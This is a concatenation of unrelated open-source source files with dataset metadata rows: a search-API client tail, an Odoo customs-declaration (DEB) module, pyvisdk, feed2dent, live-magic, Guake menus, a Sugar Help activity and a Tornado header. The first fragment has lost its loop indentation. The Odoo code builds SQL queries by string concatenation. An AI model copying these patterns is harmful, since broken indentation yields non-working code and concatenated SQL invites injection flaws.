# The category of the results, 09 - for australian sites
'c' : '09',
# number of results per page, i.e. how many results will be returned
'ps': 10,
# result page number, starting with 0
'np' : 0,
# synonyms use flag, 1 - to use, 0 - don't
'sy' : 0,
# word forms use flag, 1 - to use, 0 - don't (search for words in query exactly)
'sp' : 1,
# search mode, can be 'near', 'all', 'any'
'm' : 'near',
# results groupping by site flag, 'yes' - to group, 'no' - don't
'GroupBySite' : 'no',
# search result template
'tmplt' : 'json2.htm',
# search result ordering, 'I' - importance, 'R' - relevance, 'P' - PopRank, 'D' - date; use lower case letters for descending order
's' : 'IRPD',
# search query, should be URL-escaped
'q' : 'careers'
}
data = urllib.urlencode(params)
full_url = url + '?' + data
result = json.load(urllib2.urlopen(full_url))
rD = result['responseData']
for res in rD['results']:
print res['title']
print ' => ' + res['url']
print
print ' ** Total ' + rD['found'] + ' documents found in ' + rD['time'] + ' sec.'
print ' Displaying documents ' + rD['first'] + '-' + rD['last'] + '.'
| unlicense | 5,561,589,539,934,972,000 | 25.702128 | 131 | 0.610359 | false |
tonygalmiche/is_plastigray | is_deb.py | 1 | 16050 | # -*- coding: utf-8 -*-
from openerp import models,fields,api,SUPERUSER_ID
from openerp.tools.translate import _
from openerp.exceptions import Warning
import datetime
import xmlrpclib
#TODO :
#- DEB for imports (introduction side)
#- Add a button to access the synthesis lines once the record is finished
class is_deb(models.Model):
_name='is.deb'
_order='name desc'
def _compute(self):
uid=self._uid
user = self.env['res.users'].browse(uid)
soc=user.company_id.partner_id.is_code
for obj in self:
obj.soc=soc
name = fields.Date("Date DEB" , required=True)
date_debut = fields.Date("Date de début", required=True, help="Date de début des factures")
date_fin = fields.Date("Date de fin" , required=True, help="Date de fin des factures")
soc = fields.Char('Code société', compute='_compute', readonly=True, store=False)
line_ids = fields.One2many('is.deb.line' , 'deb_id', u"Lignes DEB")
synthese_ids = fields.One2many('is.deb.synthese', 'deb_id', u"Synthèse DEB")
state = fields.Selection([('creation', u'Création'),('modification', u'Modification des lignes'),('termine', u'Terminé')], u"État", readonly=True, select=True)
_defaults = {
'name' : lambda *a: fields.datetime.now(),
'state': 'creation',
}
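
    # Added note: "DEB" is the French Intrastat return (Declaration d'Echange de
    # Biens). As implemented below, transfert_action() rebuilds the detail lines
    # from posted invoices in the selected date range, and synthese_action()
    # then aggregates them per fiscal key for the declaration itself.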
@api.multi
def transfert_action(self):
for obj in self:
obj.line_ids.unlink()
obj.transfert()
obj.state='modification'
return obj.lignes_deb_action()
@api.multi
def transfert(self):
cr , uid, context = self.env.args
for obj in self:
user = self.pool['res.users'].browse(cr, uid, [uid])[0]
company = user.company_id.partner_id
departement = company.zip[:2]
if obj.soc=='3':
departement='70'
SQL="""
select
ai.id,
ai.internal_number,
ai.date_invoice,
ai.type,
ai.is_type_facture,
COALESCE(sp.partner_id, ai.partner_id),
left(pt.is_nomenclature_douaniere,8),
pt.is_origine_produit_id,
sum(fsens(ai.type)*pt.weight_net*ail.quantity),
sum(fsens(ai.type)*ail.price_unit*ail.quantity)
from account_invoice ai inner join account_invoice_line ail on ai.id=ail.invoice_id
inner join product_product pp on ail.product_id=pp.id
inner join product_template pt on pp.product_tmpl_id=pt.id
left outer join stock_move sm on ail.is_move_id=sm.id
left outer join stock_picking sp on sm.picking_id=sp.id
where
ai.date_invoice>='"""+str(obj.date_debut)+"""' and
ai.date_invoice<='"""+str(obj.date_fin)+"""' and
get_property_account_position(COALESCE(sp.partner_id, ai.partner_id))=1 and
pt.is_code not like '608005%' and
ai.state not in ('draft','cancel')
group by
ai.id,
ai.internal_number,
ai.date_invoice,
ai.type,
ai.is_type_facture,
sp.partner_id,
ai.partner_id,
pt.is_nomenclature_douaniere,
pt.is_origine_produit_id
"""
cr.execute(SQL)
result = cr.fetchall()
for row in result:
type_deb='exportation'
type_facture=row[3]
if type_facture=='in_invoice' or type_facture=='in_refund':
type_deb='introduction'
masse_nette=row[8]
if type_deb=='introduction':
masse_nette=0
country=self.env['res.country'].browse(row[7])
pays_origine=''
if type_deb=='introduction':
pays_origine=country.code
partner=self.env['res.partner'].browse(row[5])
pays_destination=partner.country_id.code
vals={
'deb_id' : obj.id,
'type_deb' : type_deb,
'invoice_id' : row[0],
'num_facture' : row[1],
'date_facture' : row[2],
'type_facture' : row[3]+u' '+row[4],
'partner_id' : partner.id,
'nomenclature_douaniere': row[6],
'masse_nette' : masse_nette,
'pays_origine' : pays_origine,
'pays_destination' : pays_destination,
'valeur_fiscale' : row[9],
'departement_expedition': departement,
'num_tva' : partner.vat,
}
line=self.env['is.deb.line'].create(vals)
for line in obj.line_ids:
if line.type_deb=='introduction':
                    #** Update the net mass on the lines ***********************
SQL="""
select count(*)
from is_deb_line
where
deb_id="""+str(line.deb_id.id)+""" and
invoice_id="""+str(line.invoice_id.id)+""" and
type_deb='introduction'
"""
nb=0
cr.execute(SQL)
result = cr.fetchall()
for row in result:
nb=row[0]
if nb>0 and line.invoice_id.is_masse_nette>0:
line.masse_nette=line.invoice_id.is_masse_nette/nb
#***********************************************************
                    #** Update the freight charges on the lines ****************
if nb>0:
SQL="""
select
COALESCE(sum(fsens(ai.type)*ail.price_unit*ail.quantity),0)
from account_invoice ai inner join account_invoice_line ail on ai.id=ail.invoice_id
inner join product_product pp on ail.product_id=pp.id
inner join product_template pt on pp.product_tmpl_id=pt.id
where
ai.id="""+str(line.invoice_id.id)+""" and
pt.is_code like '608005%'
"""
frais_de_port=0
cr.execute(SQL)
result = cr.fetchall()
for row in result:
frais_de_port=row[0]
if nb>0 and frais_de_port!=0:
line.valeur_fiscale=line.valeur_fiscale+frais_de_port/nb
#***********************************************************
@api.multi
def synthese_action(self):
cr , uid, context = self.env.args
for obj in self:
SQL="""
select
type_deb,
num_facture,
date_facture,
code_regime,
nomenclature_douaniere,
pays_origine,
pays_destination,
nature_transaction,
mode_transport,
departement_expedition,
num_tva,
sum(masse_nette),
sum(valeur_fiscale)
from is_deb_line
where deb_id="""+str(obj.id)+"""
group by
type_deb,
num_facture,
date_facture,
code_regime,
nomenclature_douaniere,
pays_origine,
pays_destination,
nature_transaction,
mode_transport,
departement_expedition,
num_tva
"""
cr.execute(SQL)
result = cr.fetchall()
obj.synthese_ids.unlink()
for row in result:
type_deb=row[0]
pays=row[5]
if type_deb=='exportation':
pays=row[6]
vals={
'deb_id' : obj.id,
'type_deb' : type_deb,
'num_facture' : row[1],
'date_facture' : row[2],
'code_regime' : row[3],
'nomenclature_douaniere': row[4],
'pays_destination' : pays,
'nature_transaction' : row[7],
'mode_transport' : row[8],
'departement_expedition': row[9],
'num_tva' : row[10],
'masse_nette' : row[11],
'valeur_fiscale' : row[12],
}
line=self.env['is.deb.synthese'].create(vals)
obj.state='termine'
return self.synthese_lignes_action()
@api.multi
def synthese_multi_sites_action(self):
for obj in self:
obj.synthese_ids.unlink()
databases=self.env['is.database'].search([])
for database in databases:
if database.database:
DB = database.database
USERID = SUPERUSER_ID
DBLOGIN = database.login
USERPASS = database.password
DB_SERVER = database.ip_server
DB_PORT = database.port_server
sock = xmlrpclib.ServerProxy('http://%s:%s/xmlrpc/object' % (DB_SERVER, DB_PORT))
ids = sock.execute(DB, USERID, USERPASS, 'is.deb.synthese', 'search', [
('deb_id.name', '=', obj.name),
], {})
fields=[
'type_deb',
'num_facture',
'date_facture',
'code_regime',
'nomenclature_douaniere',
'masse_nette',
'pays_destination',
'valeur_fiscale',
'nature_transaction',
'mode_transport',
'departement_expedition',
'num_tva',
]
res = sock.execute(DB, USERID, USERPASS, 'is.deb.synthese', 'read', ids, fields)
for vals in res:
vals.update({'deb_id':obj.id})
created=self.env['is.deb.synthese'].create(vals)
obj.state='termine'
return {
'name': u'Synthèse DEB',
'view_mode': 'tree,form',
'view_type': 'form',
'res_model': 'is.deb.synthese',
'domain': [
('deb_id' ,'=', obj.id),
],
'context': {
'default_deb_id' : obj.id,
},
'type': 'ir.actions.act_window',
'limit': 1000,
}
@api.multi
def lignes_deb_action(self):
for obj in self:
return {
'name': u'Lignes DEB',
'view_mode': 'tree,form',
'view_type': 'form',
'res_model': 'is.deb.line',
'domain': [
('deb_id' ,'=', obj.id),
],
'context': {
'default_deb_id' : obj.id,
},
'type': 'ir.actions.act_window',
'limit': 1000,
}
@api.multi
def synthese_lignes_action(self):
for obj in self:
return {
'name': u'Synthèse DEB',
'view_mode': 'tree,form',
'view_type': 'form',
'res_model': 'is.deb.synthese',
'domain': [
('deb_id' ,'=', obj.id),
],
'context': {
'default_deb_id' : obj.id,
},
'type': 'ir.actions.act_window',
'limit': 1000,
}
class is_deb_line(models.Model):
_name='is.deb.line'
_order='deb_id,type_deb,invoice_id'
deb_id = fields.Many2one('is.deb', "DEB", required=True, ondelete='cascade')
type_deb = fields.Selection([('introduction', u'Introduction'),('exportation', u'Exportation')], u"Type de DEB", required=True, select=True)
invoice_id = fields.Many2one('account.invoice', 'Facture')
num_facture = fields.Char("N° de facture")
date_facture = fields.Date("Date facture")
type_facture = fields.Char("Type de facture")
partner_id = fields.Many2one('res.partner', 'Client livré / Fournisseur')
code_regime = fields.Char("Code régime")
nomenclature_douaniere = fields.Char("Nomenclature douaniere")
masse_nette = fields.Float("Masse nette")
pays_origine = fields.Char("Pays d'origine" , help="Pays d'origine indiqué dans la fiche article")
pays_destination = fields.Char("Pays de destination", help="Pays de destination du client livré")
valeur_fiscale = fields.Float("Valeur fiscale" , help="Montant net facturé")
nature_transaction = fields.Char("Nature de la transaction")
mode_transport = fields.Char("Mode de transport")
departement_expedition = fields.Char("Département d'expédition", help="2 premiers chiffres du code postal du client livré")
num_tva = fields.Char("N°TVA du client livré")
_defaults = {
'code_regime' : '21',
'nature_transaction': '11',
'mode_transport' : '3',
}
class is_deb_synthese(models.Model):
_name='is.deb.synthese'
_order='deb_id,type_deb,num_facture'
deb_id = fields.Many2one('is.deb', "DEB", required=True, ondelete='cascade')
type_deb = fields.Selection([('introduction', u'Introduction'),('exportation', u'Exportation')], u"Type de DEB", required=True, select=True)
num_facture = fields.Char("N° de facture")
date_facture = fields.Date("Date facture")
code_regime = fields.Char("Code régime")
nomenclature_douaniere = fields.Char("Nomenclature douaniere")
masse_nette = fields.Float("Masse nette")
pays_destination = fields.Char("Pays", help="Pays de destination du client livré ou Pays d'expédition pour les fournisseurs")
valeur_fiscale = fields.Float("Valeur fiscale" , help="Montant net facturé")
nature_transaction = fields.Char("Nature de la transaction")
mode_transport = fields.Char("Mode de transport")
departement_expedition = fields.Char("Département d'expédition", help="2 premiers chiffres du code postal du client livré")
num_tva = fields.Char("N°TVA du client livré")
_defaults = {
'code_regime' : '21',
'nature_transaction': '11',
'mode_transport' : '3',
}
| mit | 1,110,925,696,740,326,300 | 40.382429 | 170 | 0.446831 | false |
xuru/pyvisdk | pyvisdk/do/host_disk_partition_block_range.py | 1 | 1172 |
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def HostDiskPartitionBlockRange(vim, *args, **kwargs):
'''A BlockRange data object type describes a contiguous set of blocks on a disk. A
BlockRange may describe either a partition or unpartitioned (primordial) blocks
on the disk.'''
obj = vim.client.factory.create('ns0:HostDiskPartitionBlockRange')
# do some validation checking...
if (len(args) + len(kwargs)) < 3:
        raise IndexError('Expected at least 3 arguments got: %d' % len(args))
required = [ 'end', 'start', 'type' ]
optional = [ 'partition', 'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
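
# Added sketch (hypothetical call; the argument values are only placeholders):
# the factory above expects a connected vim service instance followed by the
# required fields in the order listed, i.e. end, start and type.
def _example_block_range(vim):
    return HostDiskPartitionBlockRange(vim, 4194303, 2048, "primary")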
| mit | -7,647,620,304,849,531,000 | 32.514286 | 124 | 0.616041 | false |
GunioRobot/feed2dent | f2dlibs/jfilters.py | 1 | 1319 | """
feed2dent Jinja2 filter library
this module contains the following methods:
_tighturlify -- helper that shortens a url via the tighturl (2tu.us) service.
shortenurl -- Jinja2 filter that strips markup from a value and returns the shortened url.
"""
###
### imports
import sys
import re
import urllib
import urllib2
import logging
from jinja2 import Markup
###
### conditional imports
try: import lxml
except ImportError:
print "Could not import lxml"
sys.exit(1)
###
### method defs
def _tighturlify(apiurl, url):
"""use tighturl to shorten a url and return the shorter version"""
logger = logging.getLogger('botlibs.tighturl.ify')
## prepare the connection requirements
request = urllib2.Request('%s%s' % (apiurl, url))
request.add_header('User-agent', 'archbot/1.0')
    logger.debug('performing tighturl request')
response = urllib2.urlopen(request)
from lxml.html import parse
logger.debug('parsing response html')
doc = parse(response)
page = doc.getroot()
try:
tighturl = page.forms[0].fields['tighturl']
except KeyError:
# not where it is expected to be.
tighturl = None
logger.debug('got url: "%s"', tighturl)
return tighturl
def shortenurl(value):
safevalue = Markup(value).striptags()
shorturl = _tighturlify('http://2tu.us/?save=y&url=', safevalue)
return shorturl
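
# Added sketch (not part of the original module; the environment setup is an
# assumption about the surrounding application): registering the filter with a
# Jinja2 environment so templates can write {{ entry.link|shortenurl }}.
def _example_register_shortenurl(env):
    env.filters['shortenurl'] = shortenurl
    return env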
| bsd-3-clause | 2,463,794,963,521,435,000 | 23.886792 | 70 | 0.680061 | false |
debian-live/live-magic | DebianLive/elements/key_var.py | 1 | 4537 | # -*- coding: utf-8 -*-
#
# live-magic - GUI frontend to create Debian LiveCDs, etc.
# Copyright (C) 2007-2010 Chris Lamb <lamby@debian.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
import os
from DebianLive.utils import ListObserver
SHELL_ESCAPES = (
(r'\ '[:-1], r'\\ '[:-1]),
(r'"', r'\"'),
(r'`', r'\`'),
(r'$', r'\$'),
(r"'", r'\''),
)
REGEX = re.compile(r"""^\s*(\w+)=(?:(["\'])(([^\\\2]|\\.)*|)\2|((\w|\\["'])*))\s*(?:#.*)?$""")
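
# Added note: REGEX matches simple POSIX-style assignment lines such as
#   LB_DISTRIBUTION="sid"   or   LB_APT=apt   # optional trailing comment
# capturing the key and the quoted or bare value; the example lines above are
# illustrative only, not taken from an actual config file.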
class KeyVar(dict):
'''
Represents a POSIX shell KEY="VAR" configuration file.
'''
def __new__(cls, *args, **kwargs):
return dict.__new__(cls, *args, **kwargs)
def __init__(self, dir, name, spec, filename=None):
self.line_numbers = {}
self.stale = set()
if filename is None:
self.filename = os.path.join(dir, 'config', name)
else:
self.filename = filename
f = open(self.filename, 'r')
try:
line_no = 0
for line in f:
line_no += 1
# Check and parse key=value lines
match = REGEX.match(line)
if not match:
continue
key = match.groups()[0]
# Find the correct match group
for m in match.groups()[2:]:
if m is not None:
val = m
break
# Unescape value
for to, from_ in SHELL_ESCAPES:
val = val.replace(from_, to)
# Save line number
self.line_numbers[key] = line_no
# Mutate to file type
val_type = spec.get(key, str)
typed_val = {
int: lambda k, v: {'': None}.get(v, None),
list: lambda k, v: ListObserver(v.split(), lambda: self.stale.add(k)),
str: lambda k, v: v,
bool: lambda k, v: {'true' : True, 'false' : False, \
'yes' : True, 'no' : False}.get(v, None),
}[val_type](key, val)
# Save value
dict.__setitem__(self, key, typed_val)
finally:
f.close()
def __setitem__(self, key, value):
self.stale.add(key)
if type(value) is list:
value = ListObserver(value, lambda: self.stale.add(key))
dict.__setitem__(self, key, value)
def save(self):
"""
Update all updated entries in the file.
"""
if len(self.stale) == 0:
return
f = open(self.filename, 'r+')
lines = f.readlines()
for k in self.stale:
val = self[k]
# Escape value
if type(val) in (list, ListObserver):
for from_, to in SHELL_ESCAPES:
val = map(lambda x: x.replace(from_, to), val)
val = map(str.strip, val)
elif type(val) is str:
for from_, to in SHELL_ESCAPES:
val = val.replace(from_, to)
# Format value depending on its type
line_value = {
list : lambda v: " ".join(val),
bool : lambda v: {True: 'true', False: 'false'}.get(val, None),
str : lambda v: v,
type(None) : lambda v: "",
}[type(val)](val)
line = '%s="%s"\n' % (k, line_value)
try:
# Overwrite original line in file
lines[self.line_numbers[k] - 1] = line
except KeyError:
# Append line to end of file
lines.append("\n# The following option was added by live-magic\n")
lines.append(line)
f.close()
f = open(self.filename, 'w')
f.writelines(lines)
f.close()
self.stale = set()
| gpl-3.0 | -5,428,471,877,226,425,000 | 30.506944 | 94 | 0.486445 | false |
quozl/help-activity | helpactivity.py | 1 | 7190 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import json
from gettext import gettext as _
import gi
gi.require_version('Gtk', '3.0')
gi.require_version('WebKit', '3.0')
from gi.repository import Gtk
from gi.repository import GObject
from gi.repository import WebKit
from sugar3.activity import activity
from sugar3.graphics.toolbutton import ToolButton
from sugar3.graphics.toolbarbox import ToolbarBox
from sugar3.graphics.toolbarbox import ToolbarButton
from sugar3.activity.widgets import ActivityToolbarButton
from sugar3.activity.widgets import StopButton
from viewtoolbar import ViewToolbar
def get_current_language():
locale = os.environ.get('LANG')
return locale.split('.')[0].split('_')[0].lower()
def get_index_uri():
index_path = os.path.join(
activity.get_bundle_path(),
'html/%s/index.html' % get_current_language())
if not os.path.isfile(index_path):
index_path = os.path.join(
activity.get_bundle_path(), 'html/index.html')
return 'file://' + index_path
class HelpActivity(activity.Activity):
def __init__(self, handle):
activity.Activity.__init__(self, handle)
self.props.max_participants = 1
self._web_view = WebKit.WebView()
self._web_view.set_full_content_zoom(True)
_scrolled_window = Gtk.ScrolledWindow()
_scrolled_window.add(self._web_view)
_scrolled_window.show()
toolbar_box = ToolbarBox()
activity_button = ActivityToolbarButton(self)
toolbar_box.toolbar.insert(activity_button, 0)
activity_button.show()
viewtoolbar = ViewToolbar(self)
viewbutton = ToolbarButton(page=viewtoolbar,
icon_name='toolbar-view')
toolbar_box.toolbar.insert(viewbutton, -1)
viewbutton.show()
separator = Gtk.SeparatorToolItem()
toolbar_box.toolbar.insert(separator, -1)
separator.show()
        # let's reuse the navigation Toolbar code defined below
navtoolbar = Toolbar(self._web_view)
toolitem = Gtk.ToolItem()
navtoolbar._home.reparent(toolitem)
toolbar_box.toolbar.insert(toolitem, -1)
navtoolbar._home.show()
toolitem.show()
toolitem = Gtk.ToolItem()
navtoolbar._back.reparent(toolitem)
toolbar_box.toolbar.insert(toolitem, -1)
navtoolbar._back.show()
toolitem.show()
toolitem = Gtk.ToolItem()
navtoolbar._forward.reparent(toolitem)
toolbar_box.toolbar.insert(toolitem, -1)
navtoolbar._forward.show()
toolitem.show()
# we do not have collaboration features
# make the share option insensitive
self.max_participants = 1
separator = Gtk.SeparatorToolItem()
separator.props.draw = False
separator.set_expand(True)
toolbar_box.toolbar.insert(separator, -1)
separator.show()
stop_button = StopButton(self)
toolbar_box.toolbar.insert(stop_button, -1)
stop_button.show()
self.set_toolbar_box(toolbar_box)
toolbar_box.show()
self.set_canvas(_scrolled_window)
self._web_view.show()
self._web_view.connect("resource-request-starting",
self._resource_request_starting_cb)
self._web_view.load_uri(get_index_uri())
def _resource_request_starting_cb(self, webview, web_frame, web_resource,
request, response):
uri = web_resource.get_uri()
if uri.find('_images') > -1:
if uri.find('/%s/_images/' % get_current_language()) > -1:
new_uri = uri.replace('/html/%s/_images/' %
get_current_language(),
'/images/')
else:
new_uri = uri.replace('/html/_images/', '/images/')
request.set_uri(new_uri)
def get_document_path(self, async_cb, async_err_cb):
html_uri = self._web_view.get_uri()
rst_path = html_uri.replace('file:///', '/')
rst_path = rst_path.replace('html/', 'source/')
rst_path = rst_path.replace('.html', '.rst')
tmp_path = os.path.join(activity.get_activity_root(), 'instance',
'source.rst')
os.symlink(rst_path, tmp_path)
async_cb(tmp_path)
def read_file(self, file_path):
f = open(file_path, "r")
data = json.load(f)
self._web_view.load_uri(data['current_page'])
self._web_view.set_zoom_level(data['zoom_level'])
f.close()
def write_file(self, file_path):
"""
Save the current uri, zoom level for load it in the next startup.
"""
html_uri = self._web_view.get_uri()
zoom_level = self._web_view.get_zoom_level()
data = {'current_page': html_uri, 'zoom_level': zoom_level}
f = open(file_path, "w")
json.dump(data, f)
f.close()
class Toolbar(Gtk.Toolbar):
def __init__(self, web_view):
GObject.GObject.__init__(self)
self._web_view = web_view
self._back = ToolButton('go-previous-paired')
self._back.set_tooltip(_('Back'))
self._back.props.sensitive = False
self._back.connect('clicked', self._go_back_cb)
self.insert(self._back, -1)
self._back.show()
self._forward = ToolButton('go-next-paired')
self._forward.set_tooltip(_('Forward'))
self._forward.props.sensitive = False
self._forward.connect('clicked', self._go_forward_cb)
self.insert(self._forward, -1)
self._forward.show()
self._home = ToolButton('go-home')
self._home.set_tooltip(_('Home'))
self._home.connect('clicked', self._go_home_cb)
self.insert(self._home, -1)
self._home.show()
self._web_view.connect('notify::uri', self._uri_changed_cb)
def _uri_changed_cb(self, progress_listener, uri):
self.update_navigation_buttons()
def _loading_stop_cb(self, progress_listener):
self.update_navigation_buttons()
def update_navigation_buttons(self):
self._back.props.sensitive = self._web_view.can_go_back()
self._forward.props.sensitive = self._web_view.can_go_forward()
def _go_back_cb(self, button):
self._web_view.go_back()
def _go_forward_cb(self, button):
self._web_view.go_forward()
def _go_home_cb(self, button):
self._web_view.load_uri(get_index_uri())
| gpl-3.0 | -5,766,782,719,864,932,000 | 32.915094 | 77 | 0.614604 | false |
Stibbons/guake | guake/menus.py | 1 | 7649 | import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
from locale import gettext as _
gi.require_version('Vte', '2.91') # vte-0.42
from gi.repository import Vte
from guake.customcommands import CustomCommands
import logging
log = logging.getLogger(__name__)
def mk_tab_context_menu(callback_object):
"""Create the context menu for a notebook tab
"""
# Store the menu in a temp variable in terminal so that popup() is happy. See:
# https://stackoverflow.com/questions/28465956/
callback_object.context_menu = Gtk.Menu()
menu = callback_object.context_menu
mi_new_tab = Gtk.MenuItem(_("New Tab"))
mi_new_tab.connect("activate", callback_object.on_new_tab)
menu.add(mi_new_tab)
mi_rename = Gtk.MenuItem(_("Rename"))
mi_rename.connect("activate", callback_object.on_rename)
menu.add(mi_rename)
mi_reset_custom_colors = Gtk.MenuItem(_("Reset custom colors"))
mi_reset_custom_colors.connect("activate", callback_object.on_reset_custom_colors)
menu.add(mi_reset_custom_colors)
mi_close = Gtk.MenuItem(_("Close"))
mi_close.connect("activate", callback_object.on_close)
menu.add(mi_close)
menu.show_all()
return menu
def mk_notebook_context_menu(callback_object):
"""Create the context menu for the notebook
"""
callback_object.context_menu = Gtk.Menu()
menu = callback_object.context_menu
mi = Gtk.MenuItem(_("New Tab"))
mi.connect("activate", callback_object.on_new_tab)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Save Tabs"))
mi.connect("activate", callback_object.on_save_tabs)
menu.add(mi)
mi = Gtk.MenuItem(_("Restore Tabs"))
mi.connect("activate", callback_object.on_restore_tabs_with_dialog)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.ImageMenuItem("gtk-preferences")
mi.set_use_stock(True)
mi.connect("activate", callback_object.on_show_preferences)
menu.add(mi)
mi = Gtk.ImageMenuItem("gtk-about")
mi.set_use_stock(True)
mi.connect("activate", callback_object.on_show_about)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Quit"))
mi.connect("activate", callback_object.on_quit)
menu.add(mi)
menu.show_all()
return menu
SEARCH_SELECTION_LENGTH = 20
FILE_SELECTION_LENGTH = 30
def mk_terminal_context_menu(terminal, window, settings, callback_object):
"""Create the context menu for a terminal.
"""
# Store the menu in a temp variable in terminal so that popup() is happy. See:
# https://stackoverflow.com/questions/28465956/
terminal.context_menu = Gtk.Menu()
menu = terminal.context_menu
mi = Gtk.MenuItem(_("Copy"))
mi.connect("activate", callback_object.on_copy_clipboard)
menu.add(mi)
if get_link_under_cursor(terminal) is not None:
mi = Gtk.MenuItem(_("Copy Url"))
mi.connect("activate", callback_object.on_copy_url_clipboard)
menu.add(mi)
mi = Gtk.MenuItem(_("Paste"))
mi.connect("activate", callback_object.on_paste_clipboard)
# check if clipboard has text, if not disable the paste menuitem
clipboard = Gtk.Clipboard.get_default(window.get_display())
mi.set_sensitive(clipboard.wait_is_text_available())
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Toggle Fullscreen"))
mi.connect("activate", callback_object.on_toggle_fullscreen)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Split ―"))
mi.connect("activate", callback_object.on_split_horizontal)
menu.add(mi)
mi = Gtk.MenuItem(_("Split |"))
mi.connect("activate", callback_object.on_split_vertical)
menu.add(mi)
mi = Gtk.MenuItem(_("Close terminal"))
mi.connect("activate", callback_object.on_close_terminal)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Save content..."))
mi.connect("activate", callback_object.on_save_to_file)
menu.add(mi)
mi = Gtk.MenuItem(_("Reset terminal"))
mi.connect("activate", callback_object.on_reset_terminal)
menu.add(mi)
# TODO SEARCH uncomment menu.add()
mi = Gtk.MenuItem(_("Find..."))
mi.connect("activate", callback_object.on_find)
# menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Open link..."))
mi.connect("activate", callback_object.on_open_link)
link = get_link_under_cursor(terminal)
    # TODO CONTEXTMENU: this is a mess. "Quick Open" should also be made
    # sensitive when the selected text is a URL; the current terminal
    # implementation does not support that at the moment.
if link:
if len(link) >= FILE_SELECTION_LENGTH:
mi.set_label(_("Open Link: {!s}...").format(link[:FILE_SELECTION_LENGTH - 3]))
else:
mi.set_label(_("Open Link: {!s}").format(link))
mi.set_sensitive(True)
else:
mi.set_sensitive(False)
menu.add(mi)
mi = Gtk.MenuItem(_("Search on Web"))
mi.connect("activate", callback_object.on_search_on_web)
selection = get_current_selection(terminal, window)
if selection:
search_text = selection.rstrip()
if len(search_text) > SEARCH_SELECTION_LENGTH:
search_text = search_text[:SEARCH_SELECTION_LENGTH - 3] + "..."
mi.set_label(_("Search on Web: '%s'") % search_text)
mi.set_sensitive(True)
else:
mi.set_sensitive(False)
menu.add(mi)
mi = Gtk.MenuItem(_("Quick Open..."))
mi.connect("activate", callback_object.on_quick_open)
if selection:
filename = get_filename_under_cursor(terminal, selection)
if filename:
filename_str = str(filename)
if len(filename_str) > FILE_SELECTION_LENGTH:
mi.set_label(
_("Quick Open: {!s}...").format(filename_str[:FILE_SELECTION_LENGTH - 3])
)
else:
mi.set_label(_("Quick Open: {!s}").format(filename_str))
mi.set_sensitive(True)
else:
mi.set_sensitive(False)
else:
mi.set_sensitive(False)
menu.add(mi)
customcommands = CustomCommands(settings, callback_object)
if customcommands.should_load():
submen = customcommands.build_menu()
if submen:
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Custom Commands"))
mi.set_submenu(submen)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.ImageMenuItem("gtk-preferences")
mi.set_use_stock(True)
mi.connect("activate", callback_object.on_show_preferences)
menu.add(mi)
mi = Gtk.ImageMenuItem("gtk-about")
mi.set_use_stock(True)
mi.connect("activate", callback_object.on_show_about)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.ImageMenuItem(_("Quit"))
mi.connect("activate", callback_object.on_quit)
menu.add(mi)
menu.show_all()
return menu
def get_current_selection(terminal, window):
if terminal.get_has_selection():
terminal.copy_clipboard()
clipboard = Gtk.Clipboard.get_default(window.get_display())
return clipboard.wait_for_text()
return None
def get_filename_under_cursor(terminal, selection):
filename, _1, _2 = terminal.is_file_on_local_server(selection)
log.info("Current filename under cursor: %s", filename)
if filename:
return filename
return None
def get_link_under_cursor(terminal):
link = terminal.found_link
log.info("Current link under cursor: %s", link)
if link:
return link
return None
| gpl-2.0 | 5,360,948,063,324,771,000 | 35.578947 | 93 | 0.649706 | false |
jetskijoe/SickGear | lib/tornado/iostream.py | 1 | 65232 | #!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utility classes to write to and read from non-blocking files and sockets.
Contents:
* `BaseIOStream`: Generic interface for reading and writing.
* `IOStream`: Implementation of BaseIOStream using non-blocking sockets.
* `SSLIOStream`: SSL-aware version of IOStream.
* `PipeIOStream`: Pipe-based IOStream implementation.
"""
from __future__ import absolute_import, division, print_function, with_statement
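
# Added illustrative sketch (not part of the original file): typical coroutine
# use of the read/write API defined below, adapted from the upstream docs; the
# host and request bytes are placeholders only.
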